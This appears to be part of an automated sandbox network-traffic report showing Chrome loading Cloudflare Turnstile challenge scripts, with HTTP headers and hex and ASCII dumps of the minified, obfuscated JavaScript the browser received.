                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                  Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                                                                                                                  Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                                                                                                                  Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                  Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                                                                                                                                  Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b
                                                                                                                                                                                                  Data Ascii: rmOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  9192.168.2.1649716104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=90211ce78d29726b&lang=auto HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:51 GMT
                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 119568
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211ceb69947c84-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                                                                                                                                  Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 68 65 72 65 25 33 46 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 76 65 72 69 66 79 69 6e 67 22 3a 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65 66 72 65 73 68 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 61 69 6c 75 72 65 22 3a 22 45 72 72 6f 72 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32
                                                                                                                                                                                                  Data Ascii: here%3F","turnstile_verifying":"Verifying...","turnstile_refresh":"Refresh","turnstile_failure":"Error","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 2c 66 55 2c 66 59 2c 66 5a 2c 67 32 2c 67 33 2c 67 77 2c 67 44 2c 67 48 2c 67 30 2c 67 31 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 34 39 38 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 37 33 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 37 32 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 39 39 38 29 29 2f 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 35 30 29 29 2f 35 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 38 33 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 32 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                                                                                                                                                  Data Ascii: ,fU,fY,fZ,g2,g3,gw,gD,gH,g0,g1){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(498))/1+-parseInt(gI(773))/2+-parseInt(gI(572))/3+parseInt(gI(998))/4*(-parseInt(gI(250))/5)+-parseInt(gI(1583))/6*(-parseInt(gI(1242))/7)+parseInt(gI(
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 27 2a 27 29 3b 65 6c 73 65 7b 69 66 28 6c 3d 65 4f 28 67 5b 67 4d 28 31 31 36 37 29 5d 2c 67 5b 67 4d 28 34 37 34 29 5d 29 2c 6b 5b 67 4d 28 36 35 36 29 5d 28 67 5b 67 4d 28 31 31 36 37 29 5d 2c 45 72 72 6f 72 29 3f 67 5b 67 4d 28 31 31 36 37 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 39 37 31 29 5d 28 67 5b 67 4d 28 31 31 36 37 29 5d 2c 4f 62 6a 65 63 74 5b 67 4d 28 31 32 34 37 29 5d 28 67 5b 67 4d 28 31 31 36 37 29 5d 29 29 3a 67 5b 67 4d 28 31 31 36 37 29 5d 3d 4a 53 4f 4e 5b 67 4d 28 39 37 31 29 5d 28 67 5b 67 4d 28 31 31 36 37 29 5d 29 2c 6d 3d 6b 5b 67 4d 28 31 32 37 34 29 5d 28 69 2c 67 4d 28 32 34 30 29 29 2c 6e 3d 65 4d 5b 67 4d 28 35 31 31 29 5d 5b 67 4d 28 39 30 31 29 5d 3f 6b 5b 67 4d 28 38 39 34 29 5d 28 27 68 2f 27 2c 65 4d 5b 67 4d 28 35 31 31 29 5d
                                                                                                                                                                                                  Data Ascii: '*');else{if(l=eO(g[gM(1167)],g[gM(474)]),k[gM(656)](g[gM(1167)],Error)?g[gM(1167)]=JSON[gM(971)](g[gM(1167)],Object[gM(1247)](g[gM(1167)])):g[gM(1167)]=JSON[gM(971)](g[gM(1167)]),m=k[gM(1274)](i,gM(240)),n=eM[gM(511)][gM(901)]?k[gM(894)]('h/',eM[gM(511)]
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 5d 2c 31 30 29 2c 70 61 72 73 65 49 6e 74 28 6e 5b 33 5d 2c 31 30 29 29 3b 65 6c 73 65 7b 69 66 28 21 68 29 72 65 74 75 72 6e 3b 76 3d 69 5b 67 4e 28 31 33 35 31 29 5d 28 67 4e 28 31 34 37 33 29 29 2c 76 26 26 28 6d 5b 67 4e 28 35 31 31 29 5d 5b 67 4e 28 37 30 34 29 5d 3d 76 29 2c 78 3d 6b 5b 67 4e 28 31 33 35 31 29 5d 28 67 4e 28 34 36 39 29 29 2c 78 26 26 28 6e 5b 67 4e 28 35 31 31 29 5d 5b 67 4e 28 32 33 31 29 5d 3d 78 29 7d 7d 7d 65 6c 73 65 20 68 3d 4a 53 4f 4e 5b 67 4e 28 39 37 31 29 5d 28 65 29 3b 72 65 74 75 72 6e 20 6f 3d 7b 7d 2c 6f 5b 67 4e 28 33 36 31 29 5d 3d 68 2c 6f 5b 67 4e 28 34 37 34 29 5d 3d 69 2c 6f 5b 67 4e 28 31 33 30 38 29 5d 3d 6a 2c 6f 5b 67 4e 28 37 35 35 29 5d 3d 6b 2c 6f 5b 67 4e 28 31 31 36 37 29 5d 3d 65 2c 6f 7d 2c 65 4d 5b
                                                                                                                                                                                                  Data Ascii: ],10),parseInt(n[3],10));else{if(!h)return;v=i[gN(1351)](gN(1473)),v&&(m[gN(511)][gN(704)]=v),x=k[gN(1351)](gN(469)),x&&(n[gN(511)][gN(231)]=x)}}}else h=JSON[gN(971)](e);return o={},o[gN(361)]=h,o[gN(474)]=i,o[gN(1308)]=j,o[gN(755)]=k,o[gN(1167)]=e,o},eM[
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 64 5b 68 4d 28 34 37 30 29 5d 28 73 65 74 49 6e 74 65 72 76 61 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 52 28 29 7d 2c 31 65 33 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 76 6f 69 64 20 64 28 29 7d 65 6c 73 65 20 65 26 26 64 5b 68 4d 28 32 32 34 29 5d 28 65 5b 68 4d 28 35 36 34 29 5d 2c 68 4d 28 31 36 32 36 29 29 26 26 65 5b 68 4d 28 31 34 38 36 29 5d 3d 3d 3d 68 4d 28 33 35 30 29 26 26 28 68 4d 28 31 30 33 39 29 3d 3d 3d 64 5b 68 4d 28 31 31 32 39 29 5d 3f 64 5b 68 4d 28 37 38 34 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c 66 72 29 3a 28 68 3d 6b 5b 68 4d 28 35 31 31 29 5d 5b 68 4d 28 39 38 34 29 5d 7c 7c 31 65 34 2c 69 3d 6c 28 29 2c 21 6d 5b 68 4d 28 34 32 37 29 5d 26 26 21 64 5b 68 4d 28 31 37 31 29 5d 28 6e 29 26 26 21 6f 5b 68 4d 28 36 35 31
                                                                                                                                                                                                  Data Ascii: d[hM(470)](setInterval,function(){fR()},1e3);else return void d()}else e&&d[hM(224)](e[hM(564)],hM(1626))&&e[hM(1486)]===hM(350)&&(hM(1039)===d[hM(1129)]?d[hM(784)](clearInterval,fr):(h=k[hM(511)][hM(984)]||1e4,i=l(),!m[hM(427)]&&!d[hM(171)](n)&&!o[hM(651
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 5b 67 4a 28 38 32 39 29 5d 3d 66 6b 2c 66 53 5b 67 4a 28 31 33 38 31 29 5d 3d 66 68 2c 66 53 5b 67 4a 28 39 38 37 29 5d 3d 66 64 2c 66 53 5b 67 4a 28 32 37 30 29 5d 3d 66 63 2c 65 4d 5b 67 4a 28 36 35 31 29 5d 3d 66 53 2c 66 54 3d 7b 7d 2c 66 54 5b 67 4a 28 31 31 30 31 29 5d 3d 27 6f 27 2c 66 54 5b 67 4a 28 38 31 35 29 5d 3d 27 73 27 2c 66 54 5b 67 4a 28 31 32 36 35 29 5d 3d 27 75 27 2c 66 54 5b 67 4a 28 31 33 39 33 29 5d 3d 27 7a 27 2c 66 54 5b 67 4a 28 31 34 36 37 29 5d 3d 27 6e 27 2c 66 54 5b 67 4a 28 39 33 34 29 5d 3d 27 49 27 2c 66 54 5b 67 4a 28 34 37 36 29 5d 3d 27 62 27 2c 66 55 3d 66 54 2c 65 4d 5b 67 4a 28 31 34 31 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 69 75 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 48 29 7b 69 66 28
                                                                                                                                                                                                  Data Ascii: [gJ(829)]=fk,fS[gJ(1381)]=fh,fS[gJ(987)]=fd,fS[gJ(270)]=fc,eM[gJ(651)]=fS,fT={},fT[gJ(1101)]='o',fT[gJ(815)]='s',fT[gJ(1265)]='u',fT[gJ(1393)]='z',fT[gJ(1467)]='n',fT[gJ(934)]='I',fT[gJ(476)]='b',fU=fT,eM[gJ(1412)]=function(g,h,i,j,iu,o,x,B,C,D,E,F,H){if(
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 69 76 28 33 34 32 29 5d 28 6a 2c 48 29 7c 7c 28 6a 5b 48 5d 3d 5b 5d 29 2c 6a 5b 48 5d 5b 69 76 28 37 34 36 29 5d 28 47 29 7d 7d 2c 66 59 3d 67 4a 28 31 35 32 30 29 5b 67 4a 28 35 35 35 29 5d 28 27 3b 27 29 2c 66 5a 3d 66 59 5b 67 4a 28 37 38 39 29 5d 5b 67 4a 28 31 31 39 36 29 5d 28 66 59 29 2c 65 4d 5b 67 4a 28 39 36 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 78 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 78 3d 67 4a 2c 69 3d 7b 27 6d 70 5a 50 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 6f 55 48 42 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3c 6f 7d 2c 27 44 64 67 6f 58 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 28 6f 29 7d 7d 2c
                                                                                                                                                                                                  Data Ascii: iv(342)](j,H)||(j[H]=[]),j[H][iv(746)](G)}},fY=gJ(1520)[gJ(555)](';'),fZ=fY[gJ(789)][gJ(1196)](fY),eM[gJ(960)]=function(g,h,ix,i,j,k,l,m){for(ix=gJ,i={'mpZPM':function(n,o){return n+o},'oUHBB':function(n,o){return n<o},'DdgoX':function(n,o){return n(o)}},
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 4c 50 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 66 77 54 4a 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 75 6e 56 56 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 56 74 63 78 67 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 46 6a 4d 59 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 68 4e 55 47 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 47 69 69 49 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 67 72 43 76 6e 27 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                  Data Ascii: LPV':function(h,i){return h<<i},'fwTJe':function(h,i){return i&h},'unVVq':function(h,i){return h-i},'Vtcxg':function(h,i){return h==i},'FjMYL':function(h,i){return i|h},'hNUGn':function(h,i){return h==i},'GiiIk':function(h,i){return i==h},'grCvn':function
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC1369INData Raw: 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 6a 65 28 31 35 30 36 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 6a 65 28 38 34 39 29 5d 28 48 2c 31 29 7c 4d 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 65 28 37 34 36 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 65 28 34 31 34 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 6a 65 28 36 35 30 29 5d 28 31 36 2c 73 29 3b 48 3d 64 5b 6a 65 28 39 34 33 29 5d 28 48 3c 3c 31 2e 32 31 2c 31 26 4d 29 2c 64 5b 6a 65 28 31 36 30 30 29 5d 28 49 2c 64 5b 6a 65 28 31 31 31 36 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 65 28 37 34 36 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74
                                                                                                                                                                                                  Data Ascii: {for(M=1,s=0;d[je(1506)](s,F);H=d[je(849)](H,1)|M,I==j-1?(I=0,G[je(746)](o(H)),H=0):I++,M=0,s++);for(M=C[je(414)](0),s=0;d[je(650)](16,s);H=d[je(943)](H<<1.21,1&M),d[je(1600)](I,d[je(1116)](j,1))?(I=0,G[je(746)](o(H)),H=0):I++,M>>=1,s++);}D--,D==0&&(D=Mat


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  10192.168.2.1649717104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:51 UTC240INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:51 GMT
                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                  Content-Length: 61
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: max-age=2629800, public
